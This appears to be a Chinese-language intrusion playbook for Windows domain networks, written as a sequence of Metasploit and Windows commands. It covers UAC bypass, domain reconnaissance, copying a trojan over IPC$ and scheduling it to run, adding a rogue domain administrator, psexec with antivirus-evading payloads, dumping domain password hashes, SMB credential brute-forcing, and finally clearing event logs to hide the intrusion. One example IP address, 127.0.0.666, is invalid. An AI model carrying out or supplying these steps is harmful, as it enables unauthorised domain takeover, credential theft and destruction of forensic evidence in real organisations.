LAN

LAN

内网域渗透

环境假定

假设已经渗透了一台服务器

name:P1
IP:10.11.0.110

P1 是连接内网和外网的关键节点,其它内网服务器均不能直接连接外网

提权

Meterpreter > shell #进入目标shell
#然后查看权限
whoami #假设结果是,xksec
net user xksec /domain

用msf的本地提权漏洞模块,逐个尝试漏洞提权

漏洞提权失败,用Bypass UAC

use exploit/windows/local/bypassuac
set session 9
run #如果成功会返回一个新的session

如果提权没成功,也是能以此机器为跳板攻击其它服务器的

信息收集

net user /domain #查看域用户
net view /domain #查看有几个域
net view /domain:xxx #查看域内主机
net group /domain #查看域里面的组
net group "domain computers" /domain #查看域内所有主机名
net group "domain admins" /domain #查看域管理员
net group "domain controllers" /domain #查看域控制器
net group "enterprise admins" /domain #查看企业管理组
nettime /domain #查看时间服务器

通过以上信息收集,可以分析出内网是怎么划分的、机器命名规则、重要人物的机器

获取一台服务器的权限

现在因为权限问题,不可以直接攻击域服务器,可采取以下方法继续渗透

  • 用Meterpreter现有权限添加内网路由,扫描弱口令

  • PowerShell内网扫描( 目标系统win7以上)

  • 架设Socks4a,然后socks会自动进行内网扫描

  • 利用当前权限进行内网IPC$渗透

net view #在列举的机器名里,选一个和我们机器名相似的来进行IPC$渗透

假设现在有一台主机,127.0.0.666

net use \127.0.0.666/ipc$ #连接目标IPC$共享
copy s.exe \127.0.0.666\ipc$ #复制木马到目标
net time \127.0.0.666 #查时间
at \127.0.0.666 10:11 s.exe #定时启动木马

如果得到的是system权限就可以上传Mimikatz抓hash了

获取域管权限

迁移进程到域管用户进程上,或者令牌窃取也能获取域管权限

然后查看主域控IP

net time #一般来说,时间服务器都是域服务器

接着,故技重施IPC$渗透返回一个shell

如果at命令被禁用可能是win 2012,使用schtasks来添加计划任务

schtasks /run /tn Mytask

给域控添加管理员账户

net user wintry 514637666 /ad /domain
net group "domain admins" wintry /ad /domain
net group "domain admins" /domain #查看是否添加成功

登陆域控制

使用msf中的PsExec模块,建议使用Veil之类工具生成免杀的payload

use exploit/windows/smb/psexec
set smbuser wintry
set smbpass 514637666
set smbdomain MEDAB #域名称
run

反弹成功后,先迁移进程,然后查看sessions(有几个域控权限)

用msf自带模块dumphash抓取域hash,要有system权限

use post/windows/gather/smart_hashdump
show options
set session 5 #域控shell
run

SMB爆破内网

Metepreter > backgroud
exploit > route add 10.11.0.110 255.255.0.0 2 #后边是session id
search smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.11.0.110/24
set smbuser 域控user
set smbpass 域控pass
set smbdomain MA...
set threads 20
run

扫描完成后,creds,整理扫描结构

获取到了大量内网主机密码

可以使用Meterpreter下的Socks4a或其它第三方软件,端口转发,畅游内网了

Meterpreter > portfwd add -l 5555 -p 3389 -r 目标IP
Meterpreter > backgroud

清理日志

删除之前添加的用户账号

cmd > net user wintry /del
cmd > logoff

删除日志

meterpreter > clearev

关闭所有msf连接

sessions
sessions -K